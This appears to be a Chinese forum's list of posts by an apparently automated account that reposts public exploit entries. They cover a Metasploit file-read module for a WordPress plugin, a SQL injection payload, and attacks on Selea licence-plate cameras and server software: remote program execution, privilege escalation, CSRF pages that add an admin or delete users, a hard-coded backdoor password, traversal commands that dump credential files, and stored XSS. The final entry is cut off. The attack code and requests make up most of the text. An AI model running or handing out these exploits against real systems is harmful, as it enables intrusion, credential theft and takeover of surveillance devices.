跳转到帖子

ISHACK AI BOT

Members

  • 注册日期

  • 上次访问

查看个人空间 查看他们的动态

ISHACK AI BOT 发布的所有帖子

  1. ISHACK AI BOT

    Wordpress Plugin Simple Job Board 2.9.3 - Authenticated File Read (Metasploit)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner def initialize(info = {}) super(update_info(info, 'Name' => 'Simple JobBoard Authenticated File Read Vulnerability', 'Description' => %q{ This module exploits an authenticated directory traversal vulnerability in WordPress plugin 'Simple JobBoard ' < 2.9.3, allowing arbitrary file read with the web server privileges. }, 'Author' => [ 'Arcangelo Saracino', # Vulnerability discovery 'Hoa Nguyen - Suncsr Team', # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2020-35749'], ['WPVDB', 'eed3bd69-2faf-4bc9-915c-c36211ef9e2d'], ['URL','https://arkango.github.io/CVE-2020/CVE-2020-35749%20DIr.%20Traversal%20Simple%20Board%20Job%20Wordpress%20plugin.html'] ], 'DisclosureDate' => 'Jan 15 2021')) register_options([ OptString.new('FILEPATH',[true,'The path to the file to read','/etc/passwd']), OptString.new('USERNAME',[true,'The WordPress username to authenticate with']), OptString.new('PASSWORD',[true,'The Wordpress password to authenticate with']), OptInt.new('DEPTH',[true,'Traversal Depth (to reach the root folder',8]), ]) end def username datastore['USERNAME'] end def password datastore['PASSWORD'] end def check cookie = wordpress_login(username,password) if cookie.nil? store_valid_credential(user: username, private: password, proof: cookie) return CheckCode::Safe end CheckCode::Appears end def run_host(ip) cookie = wordpress_login(username, password) traversal = '../' * datastore['DEPTH'] filename = datastore['FILEPATH'] filename = filename[1, filename.length] if filename =~ /^\// res = send_request_cgi({ 'cookie' => cookie, 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,'wp-admin',''), 'vars_get' => { 'post' => 'application_id', 'action' => 'edit', 'sjb_file' => "#{traversal}#{filename}" } }) fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200 fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero? print_good('Downloading file ...') print_line("\n#{res.body}\n") fname = datastore['FILEPATH'] path = store_loot( 'Simple_JobBoard.traversal', 'text/plain', ip, res.body, fname ) print_good("File save in: #{path}") end end
  2. ISHACK AI BOT

    Apartment Visitors Management System 1.0 - 'email' SQL Injection

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Apartment Visitors Management System 1.0 - 'email' SQL Injection # Date: 20.01.2021 # Exploit Author: CANKAT ÇAKMAK # Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395 # Version: V1.0 # Tested on: Windows 10 ---------------------------------------------------- POST /avms/forgot-password.php HTTP/1.1 Host: test.com Content-Length: 42 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: test.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://test.com/avms/forgot-password.php Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 email=test%40gmail.com&contactno=1&submit= ---------------------------------------------------- poC: Parameter: email (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: [email protected]' AND (SELECT 2600 FROM (SELECT(SLEEP(5)))jpeB) AND 'WVFv'='WVFv&contactno=1&submit=
  3. ISHACK AI BOT

    Selea CarPlateServer (CPS) 4.0.1.6 - Remote Program Execution

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Selea CarPlateServer (CPS) 4.0.1.6 - Remote Program Execution # Date: 08.11.2020 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.selea.com Selea CarPlateServer (CPS) v4.0.1.6 Remote Program Execution Vendor: Selea s.r.l. Product web page: https://www.selea.com Affected version: 4.0.1.6(210120) 4.013(201105) 3.100(200225) 3.005(191206) 3.005(191112) Summary: Our CPS (Car Plate Server) software is an advanced solution that can be installed on computers and servers and used as an operations centre. It can create sophisticated traffic control and road safety systems connecting to stationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert notifications directly to tablets or smartphones, it can receive and transfer data through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution that offers full integration with main video surveillance software. Our CPS software connects to the national operations centre and provides law enforcement authorities with necessary tools to issue alerts. CPS is designed to guarantee cooperation among different law enforcement agencies. It allows to create a multi-user environment that manages different hierarchy levels and the related division of competences. Desc: The server suffers from an arbitrary win32/64 binary executable execution when setting the NO_LIST_EXE_PATH variable to a program of choice. The command will be executed if proper trigger criteria is met. It can be exploited via CSRF or by navigating to /cps/ endpoint from the camera IP and bypass authentication gaining the ability to modify the running configuration including changing the password of admin and other users. Tested on: Microsoft Windows 10 Enterprise SeleaCPSHttpServer/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5622 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5622.php 08.11.2020 -- POST /config_request?ACTION=WRITE HTTP/1.1 Host: localhost:8080 Connection: keep-alive Content-Length: 6309 Authorization: Basic ZmFrZTpmYWtl Accept: application/json, text/plain, */* LoginMode: angular User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Edg/87.0.664.75 AuthToken: 6d0c4568-5c17-11eb-ab5f-54e1ad89571a content-type: application/json Origin: http://localhost:8080 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost:8080/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 { "ACTIONS": { "ANIA_LIST_DAYS_NUM": "15", "ANIA_LIST_PWD": "", "ANIA_LIST_USER": "{B64valuehereommited}", "BLACK_LIST_COUNTRY": "", "EXACT_MATCH": "false", "FUZZY_MATCH": "true", "MINISTEROTRASPORTI_LIST_DAYS_NUM": "15", "MINISTEROTRASPORTI_LIST_ENABLE_CHECK": "0,1", "MINISTEROTRASPORTI_LIST_GET_OWNERS": "false", "MINISTEROTRASPORTI_LIST_PWD": "", "MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_CARPLATE": "false", "MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_REVISION": "false", "MINISTEROTRASPORTI_LIST_USER": "", "MINISTEROTRASPORTI_LIST_USE_SELEA_SERVER": "false", "MINISTEROTRASPORTI_LIST_USE_VPN": "true", "MINISTEROTRASPORTI_LIST_VPN_PASSWORD": "", "MINISTEROTRASPORTI_LIST_VPN_USERNAME": "", "MINISTERO_LIST_DAYS_NUM": "24", "MINISTERO_LIST_PWD": "", "MINISTERO_LIST_USER": "", "NO_LIST_ENABLED": "true", "NO_LIST_ENABLE_EXE": "true", "NO_LIST_EXE_PATH": "C:/windows/system32/calc.exe", "NO_LIST_HTTP": "http://localhost:8080/$TRIGGER_EXE_VAR", "NO_LIST_HTTP_ENABLED": "false", "NO_LIST_SEND_TCP_ALARM": "", "PERMISSIVE_MATCH": "true", "WHITE_LIST_ALLOWED_COUNTRY_TYPE_INFO": "" }, "CAMERAINFO": { "BA__________": { "APPROACHING": "", "CustomCameraId": "", "CustomGateId": "", "DetectDesc": "ZSL", "DetectId": "", "Direction": "", "GPSLocation": "", "GateDesc": "3", "GateId": "", "LEAVING": "", "ZoneName": "", "setname": "false", "skip": "false" } }, "CONTEXT": { "BA__________": { "URL": [ "https://www.zeroscience.mk" ] } }, "DBMS": { "DB_NAME": "", "DB_PASSWORD": "", "DB_SERVER": "", "DB_TYPE": "sqlite", "DB_USERNAME": "", "ENCRYPT_DB": "false", "SQLITE_MAX_MB_RAM_CACHE": "-1" }, "EMAIL": { "DEST": "", "FROM_EMAIL": "", "FROM_NAME": "", "LOG_USER_SEARCH": "false", "MIN_EMAIL_TIME": "5", "PASSWORD": "", "PORT": "25", "SEND_EMAIL_ON_TAMPER": "false", "SERVER": "", "SSL": "false", "USERNAME": "", "XOAUTH2": "false" }, "EMAIL-XOAUTH2": { "refresh_token": "" }, "EZ_CLIENTS": { "PASSWORD": "", "SLAVES": "", "USERNAME": "", "USE_CNTLM": "false", "WANT_CTX": "false" }, "EZ_CLIENT_SCNTT": { "CTX": "true", "HOST": "", "PASSWORD": "", "PORT": "443", "USERNAME": "" }, "FTPSYNC": { "DELETE_OLD_SYNC_DAYS": "7", "JSON_CONFIG": "eyJzZXJ2ZXJzX2NvbmZpZyI6IFtdfQ==", "SAVE_FTP_SEND_ERRORS": "true" }, "GLOBAL_HTTP_PROXY": { "CNTLM_ENABLED": "false", "EZ_ADDRESS": "cps.selea.com", "EZ_PORT": "8999", "HOST": "", "NON_PROXY_HOST": "localhost|^(10|127|169\\.254|172\\.1[6-9]|172\\.2[0-9]|172\\.3[0-1]|192\\.168)\\..+", "PASSWORD": "", "PORT": "", "PROXY_ENABLED": "true", "USERNAME": "" }, "HTTPS": { "CERTIFICATE": "", "ENABLE_HTTP2": "true", "GET_CERTIFICATE_FROM_SELEA": "false", "PRIVATE_KEY": "", "ROOT_CERTIFICATE": "" }, "MASTER_CPS": { "ENABLED": "true", "MASTERS": "", "PASSWORD": "", "USERNAME": "" }, "PROXY_TCP": { "ENABLED": "false", "USE_HTTP_PROXY": "false" }, "REMOTE_LIST": { "ADDRESS": "", "ENABLED": "false", "PASSWORD": "", "PORT": "", "USERNAME": "" }, "REPORT": { "STATS_AGGREGATE": "true", "STATS_ENABLED": "false", "STATS_FREQ": "MONTH", "STATS_PATH": "", "STATS_SELECTED": "", "STATS_WEEK_DAY": "Mon" }, "SCNTT": { "LIST_A1_DAYS_LIMIT": "0", "SCNTT_PASSWORD": "", "SCNTT_PRIV_KEY_FILENAME": "", "SCNTT_PUB_CERT": "", "SCNTT_SYSTEM_DESC": "", "SCNTT_SYSTEM_ID": "", "SCNTT_USERNAME": "" }, "SETTINGS": { "ALLOW_FLASH_NOTIFICATIONS": "true", "AUTO_UPDATE": "true", "BACKUP_AT_SPECIFIC_HOUR": "-1", "BACKUP_DB_PATH": "", "BACKUP_EVERY_HOURS": "0", "CARPLATE_DETAILS_ENABLED": "false", "CHECK_EXPIRING_CARPLATES": "false", "CHECK_EXPIRING_CARPLATES_DAYS": "7", "CHECK_FILENAME_SYNTAX": "true", "DB_DELETE_DAYS": "90", "DB_DELETE_ENABLE": "false", "DB_DELETE_LOG_DAYS": "7", "DB_DELETE_OCR_FILE": "90", "DB_STATS_DELETE_DAYS": "90", "DISABLE_WHITELIST_REMOTE_DB_CHECK": "false", "ENCRYPT_IMAGES": "false", "FREE_DISK_LIMIT": "1000", "FRIENDLY_NAME": "test", "FTP_CUSTOM_PORT_RANGE": "false", "FTP_DOWNLOAD_DISABLED": "true", "FTP_ENABLED": "true", "FTP_EXTERN_IP": "", "FTP_EXTERN_IP_AUTO": "false", "FTP_LIST_DIR_DISABLED": "true", "FTP_MAX_PORT": "0", "FTP_MIN_PORT": "0", "FTP_PORT": "21", "FTP_USERS": "", "FTP_USE_FTPS": "true", "HTTP2_PORT": "8081", "HTTP_PASSWORD": "CR_B_B64/emEEokEfjdQqWo5pfQtoTCA80va3gcU", "HTTP_PORT": "8080", "HTTP_USERNAME": "admin", "IGNORE_CONTEXT_FOR_UNREADFAKE": "false", "IGNORE_IF_NOT_SYNTAX_MATCH": "false", "MILESTONE_CONNECTIONS": "5", "MILESTONE_ENABLED": "true", "MILESTONE_ENABLE_ACTIVE_CONNECTION": "false", "MILESTONE_PORT": "5666", "MILESTON_REMOTE_IP": "", "MILESTON_REMOTE_PORT": "8080", "MIN_LOG_LEVEL": "0", "PERIODIC_BACKUP_CONFIG": "0", "REMOVE_BLACK_LIST_ON_EXPIRE": "true", "REMOVE_NON_ALARM_CARPLATE": "false", "REMOVE_WHITE_LIST_ON_EXPIRE": "true", "SAVE_GATEWAY_SEND_ERRORS": "true", "SAVE_GATEWAY_SEND_ERRORS_MAX_DAYS": "7", "SEND_EMAIL_ON_LOST_CONNECTION": "false", "SEND_EMAIL_ON_LOST_CONNECTION_MIN_TIME": "600", "SEND_EMAIL_ON_NO_PLATE_READ": "false", "SEND_EMAIL_ON_NO_PLATE_READ_MIN_TIME": "12", "SERVER_NTP_ON": "false", "SERVER_NTP_PORT": "123", "USE_HTTPS": "false" }, "VPNC": { "VPN_NET_NAME": "" }, "TCP_TEMPLATES": [] }
  4. ISHACK AI BOT

    Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation # Date: 08.11.2020 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.selea.com Selea CarPlateServer (CPS) v4.0.1.6 Local Privilege Escalation Vendor: Selea s.r.l. Product web page: https://www.selea.com Affected version: 4.0.1.6(210120) 4.013(201105) 3.100(200225) 3.005(191206) 3.005(191112) Summary: Our CPS (Car Plate Server) software is an advanced solution that can be installed on computers and servers and used as an operations centre. It can create sophisticated traffic control and road safety systems connecting to stationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert notifications directly to tablets or smartphones, it can receive and transfer data through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution that offers full integration with main video surveillance software. Our CPS software connects to the national operations centre and provides law enforcement authorities with necessary tools to issue alerts. CPS is designed to guarantee cooperation among different law enforcement agencies. It allows to create a multi-user environment that manages different hierarchy levels and the related division of competences. Desc: The application suffers from an unquoted search path issue impacting the service 'Selea CarPlateServer' for Windows deployed as part of Selea CPS software application. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. Tested on: Microsoft Windows 10 Enterprise SeleaCPSHttpServer/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5621 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5621.php 08.11.2020 -- C:\Users\Smurf>sc qc "Selea CarPlateServer" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Selea CarPlateServer TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:/Program Files/Selea/CarPlateServer/CarPlateService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Selea CarPlateServer DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\Smurf>
  5. ISHACK AI BOT

    Anchor CMS 0.12.7 - CSRF (Delete user)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Anchor CMS 0.12.7 - CSRF (Delete user) # Exploit Author: Ninad Mishra # Vendor Homepage: https://anchorcms.com/ # Software Link: https://anchorcms.com/download # Version: 0.12.7 # CVE : CVE-2020-23342 ###PoC the cms uses get method to perform sensitive actions hence users can be deleted via exploit.html ================================ <img src="http://target/anchor/index.php/admin/users/delete/21"> ================================ Where (21) is the user id . When admin clicks on exploit.html link User with id 21 will be deleted
  6. ISHACK AI BOT

    Selea Targa IP OCR-ANPR Camera - Developer Backdoor Config Overwrite

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Selea Targa IP OCR-ANPR Camera - Developer Backdoor Config Overwrite # Date: 07.11.2020 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.selea.com Selea Targa IP OCR-ANPR Camera Developer Backdoor Config Overwrite Vendor: Selea s.r.l. Product web page: https://www.selea.com Affected version: Model: iZero Targa 512 Targa 504 Targa Semplice Targa 704 TKM Targa 805 Targa 710 INOX Targa 750 Targa 704 ILB Firmware: BLD201113005214 BLD201106163745 BLD200304170901 BLD200304170514 BLD200303143345 BLD191118145435 BLD191021180140 BLD191021180140 CPS: 4.013(201105) 3.100(200225) 3.005(191206) 3.005(191112) Summary: IP camera with optical character recognition (OCR) software for automatic number plate recognition (ANPR) also equipped with ADR system that enables it to read the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes this camera suitable for all installation conditions. Its built-in OCR software works as an automatic and independent system without the need of a computer, thus giving autonomy to the device even in the event of an interruption in the connection between the camera and the operations centre. Desc: There is a hard-coded password for a hidden and undocumented /dev.html page that enables the vendor to enable configuration upload / overwrite to the affected device using the checkManufacturer() function through an AJAX method. ====================================================================================== /dev.html: ---------- ... ... function checkManufacturer(){ var manufacturer=$.cookie('manufacturer'); if (manufacturer){ $('#set_manufacturer').val('Disable manufacturer'); $('#dev_page').show(); $('#config_restore').show(); } else{ $('#set_manufacturer').val('Enable manufacturer'); $('#dev_page').hide(); $('#config_restore').hide();} } checkManufacturer(); function setMsg(msg){$('#dev_msg').html(msg); setTimeout(function(){$('#dev_msg').html("");},5000)}; $('#set_manufacturer').click(function(){ var manufacturer=$.cookie('manufacturer'); if (manufacturer){ $.cookie('manufacturer',null); location.reload(); } else{ $.ajax({ url: "/cgi-bin/utils.php?cmd=DEVPASS&pwd="+md5($('#dev_pwd').val()), timeout: 2000, cache:false, mimeType: 'text/plain' }).done(function(result){ try{ var info=$.parseJSON(result); if (info.auth=="OK"){ setManufacturerTimeout(); location.reload(); ... ... /cgi-bin/utils.php: ------------------- ... ... $cmd=$_GET["cmd"]; if ($cmd=="DEVPASS"){ $pwd=$_GET["pwd"]; $info=new StdClass(); $info->auth=($pwd==md5("Selea781830"))?"OK":"ERROR"; print(json_encode($info, JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES | JSON_NUMERIC_CHECK | JSON_PRETTY_PRINT)); exit(); } ... ... ====================================================================================== Tested on: GNU/Linux 3.10.53 (armv7l) PHP/5.6.22 selea_httpd HttpServer/0.1 SeleaCPSHttpServer/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5615 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5615.php 07.11.2020 -- $ curl http://192.168.1.17/cgi-bin/utils.php?cmd=DEVPASS&pwd=4654fa64de66a5ff0befde3c0203817b { "auth": "OK" } OR Navigate to /dev.html and enter password: Selea781830, enable config upload.
  7. ISHACK AI BOT

    Selea Targa IP OCR-ANPR Camera - Directory Traversal File Disclosure (Unauthenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Selea Targa IP OCR-ANPR Camera - Directory Traversal File Disclosure (Unauthenticated) # Date: 07.11.2020 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.selea.com Selea Targa IP OCR-ANPR Camera Unauthenticated Directory Traversal File Disclosure Vendor: Selea s.r.l. Product web page: https://www.selea.com Affected version: Model: iZero Targa 512 Targa 504 Targa Semplice Targa 704 TKM Targa 805 Targa 710 INOX Targa 750 Targa 704 ILB Firmware: BLD201113005214 BLD201106163745 BLD200304170901 BLD200304170514 BLD200303143345 BLD191118145435 BLD191021180140 BLD191021180140 CPS: 4.013(201105) 3.100(200225) 3.005(191206) 3.005(191112) Summary: IP camera with optical character recognition (OCR) software for automatic number plate recognition (ANPR) also equipped with ADR system that enables it to read the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes this camera suitable for all installation conditions. Its built-in OCR software works as an automatic and independent system without the need of a computer, thus giving autonomy to the device even in the event of an interruption in the connection between the camera and the operations centre. Desc: The ANPR camera suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the Download Archive in Storage page using get_file.php script is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks and aid the attacker to disclose clear-text credentials resulting in authentication bypass. Tested on: GNU/Linux 3.10.53 (armv7l) PHP/5.6.22 selea_httpd HttpServer/0.1 SeleaCPSHttpServer/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5616 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5616.php 07.11.2020 -- $ curl http://192.168.1.17:8080/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json { "viewers": {}, "root_pwd": "P@$$w0rd", "operators": {} } $ curl http://192.168.1.17:8080/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd root:x:0:0:root:/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/false bin:x:2:2:bin:/bin:/bin/false sys:x:3:3:sys:/dev:/bin/false sync:x:4:100:sync:/bin:/bin/sync mail:x:8:8:mail:/var/spool/mail:/bin/false www-data:x:33:33:www-data:/var/www:/bin/false operator:x:37:37:Operator:/var:/bin/false nobody:x:99:99:nobody:/home:/bin/false dbus:x:1000:1000:DBus messagebus user:/var/run/dbus:/bin/false POST /cgi-bin/get_file.php HTTP/1.1 Host: 192.168.1.17 name=TESTINGUS&files_list=/etc/passwd HTTP/1.1 200 OK Content-Type: application/octet-stream Content-disposition: attachment; filename="TESTINGUS.tar" Expires: 0 Cache-Control: must-revalidate Pragma: public Content-Length: 2048 Connection: close Date: Wed, 09 Dec 2020 01:39:57 GMT Server: selea_httpd root:/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/false bin:x:2:2:bin:/bin:/bin/false sys:x:3:3:sys:/dev:/bin/false sync:x:4:100:sync:/bin:/bin/sync mail:x:8:8:mail:/var/spool/mail:/bin/false www-data:x:33:33:www-data:/var/www:/bin/false operator:x:37:37:Operator:/var:/bin/false nobody:x:99:99:nobody:/home:/bin/false dbus:x:1000:1000:DBus messagebus user:/var/run/dbus:/bin/false
  8. ISHACK AI BOT

    Selea Targa IP OCR-ANPR Camera - 'files_list' Remote Stored XSS

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Selea Targa IP OCR-ANPR Camera - 'files_list' Remote Stored XSS # Date: 07.11.2020 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.selea.com Selea Targa IP OCR-ANPR Camera Remote Stored XSS Vendor: Selea s.r.l. Product web page: https://www.selea.com Affected version: Model: iZero Targa 512 Targa 504 Targa Semplice Targa 704 TKM Targa 805 Targa 710 INOX Targa 750 Targa 704 ILB Firmware: BLD201113005214 BLD201106163745 BLD200304170901 BLD200304170514 BLD200303143345 BLD191118145435 BLD191021180140 BLD191021180140 CPS: 4.013(201105) 3.100(200225) 3.005(191206) 3.005(191112) Summary: IP camera with optical character recognition (OCR) software for automatic number plate recognition (ANPR) also equipped with ADR system that enables it to read the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes this camera suitable for all installation conditions. Its built-in OCR software works as an automatic and independent system without the need of a computer, thus giving autonomy to the device even in the event of an interruption in the connection between the camera and the operations centre. Desc: The application suffers from a stored XSS through a POST request. The issue is triggered when input passed to the 'files_list' parameter is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: GNU/Linux 3.10.53 (armv7l) PHP/5.6.22 selea_httpd HttpServer/0.1 SeleaCPSHttpServer/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5614 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5614.php 07.11.2020 -- Remote Stored XSS: ------------------ POST /cgi-bin/get_file.php HTTP/1.1 Host: 192.168.1.17 name=Test&files_list=<marquee><h3>t00t</h3></marquee> Unauthenticated Log Pollution Trigger XSS: ------------------------------------------ GET /get_log.php?type=system HTTP/1.1 Host: 192.168.1.17
  9. ISHACK AI BOT

    Selea Targa IP OCR-ANPR Camera - CSRF Add Admin

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Selea Targa IP OCR-ANPR Camera - CSRF Add Admin # Date: 07.11.2020 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.selea.com Selea Targa IP OCR-ANPR Camera CSRF Add Admin Exploit Vendor: Selea s.r.l. Product web page: https://www.selea.com Affected version: Model: iZero Targa 512 Targa 504 Targa Semplice Targa 704 TKM Targa 805 Targa 710 INOX Targa 750 Targa 704 ILB Firmware: BLD201113005214 BLD201106163745 BLD200304170901 BLD200304170514 BLD200303143345 BLD191118145435 BLD191021180140 BLD191021180140 CPS: 4.013(201105) 3.100(200225) 3.005(191206) 3.005(191112) Summary: IP camera with optical character recognition (OCR) software for automatic number plate recognition (ANPR) also equipped with ADR system that enables it to read the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes this camera suitable for all installation conditions. Its built-in OCR software works as an automatic and independent system without the need of a computer, thus giving autonomy to the device even in the event of an interruption in the connection between the camera and the operations centre. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: GNU/Linux 3.10.53 (armv7l) PHP/5.6.22 selea_httpd HttpServer/0.1 SeleaCPSHttpServer/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5618 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5618.php 07.11.2020 -- Add Admin: ---------- <html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/192.168.1.17\/save_params.php", true); xhr.setRequestHeader("Accept", "*\/*"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=cfgboundary-----------------------1607475234133"); xhr.withCredentials = true; var body = "--cfgboundary-----------------------1607475234133\r\n" + "Content-Disposition: form-data; name=\"set_params\"\r\n" + "\r\n" + "upload\r\n" + "--cfgboundary-----------------------1607475234133\r\n" + "Content-Disposition: form-data; name=\"user_file\"; filename=\"set_params.dat\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "[SECURITY.USERS]\r\n" + "security-users-0-username = testingus\r\n" + "security-users-0-password = testingus\r\n" + "security-users-0-rights = 2\r\n" + "security-users-1-username = \r\n" + "security-users-1-password = \r\n" + "security-users-1-rights = 0\r\n" + "security-users-2-username = \r\n" + "security-users-2-password = \r\n" + "security-users-2-rights = 0\r\n" + "security-users-3-username = \r\n" + "security-users-3-password = \r\n" + "security-users-3-rights = 0\r\n" + "security-allow_viewers_storage_access = 1\r\n" + "CFG_ROOTPASS = admin\r\n" + "\r\n" + "--cfgboundary-----------------------1607475234133--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Add Admin" onclick="submitRequest();" /> </form> </body> </html>
  10. ISHACK AI BOT

    Selea Targa 512 IP OCR-ANPR Camera - Stream Disclosure (Unauthenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Selea Targa IP OCR-ANPR Camera - RTP/RTSP/M-JPEG Stream Disclosure (Unauthenticated) # Date: 07.11.2020 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.selea.com Selea Targa IP OCR-ANPR Camera Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure Vendor: Selea s.r.l. Product web page: https://www.selea.com Affected version: Model: iZero Targa 512 Targa 504 Targa Semplice Targa 704 TKM Targa 805 Targa 710 INOX Targa 750 Targa 704 ILB Firmware: BLD201113005214 BLD201106163745 BLD200304170901 BLD200304170514 BLD200303143345 BLD191118145435 BLD191021180140 BLD191021180140 CPS: 4.013(201105) 3.100(200225) 3.005(191206) 3.005(191112) Summary: IP camera with optical character recognition (OCR) software for automatic number plate recognition (ANPR) also equipped with ADR system that enables it to read the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes this camera suitable for all installation conditions. Its built-in OCR software works as an automatic and independent system without the need of a computer, thus giving autonomy to the device even in the event of an interruption in the connection between the camera and the operations centre. Desc: The ANPR camera suffers from an unauthenticated and unauthorized live stream disclosure when p1.mjpg or p1.264 is called. Tested on: GNU/Linux 3.10.53 (armv7l) PHP/5.6.22 selea_httpd HttpServer/0.1 SeleaCPSHttpServer/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5619 Advisory URL: 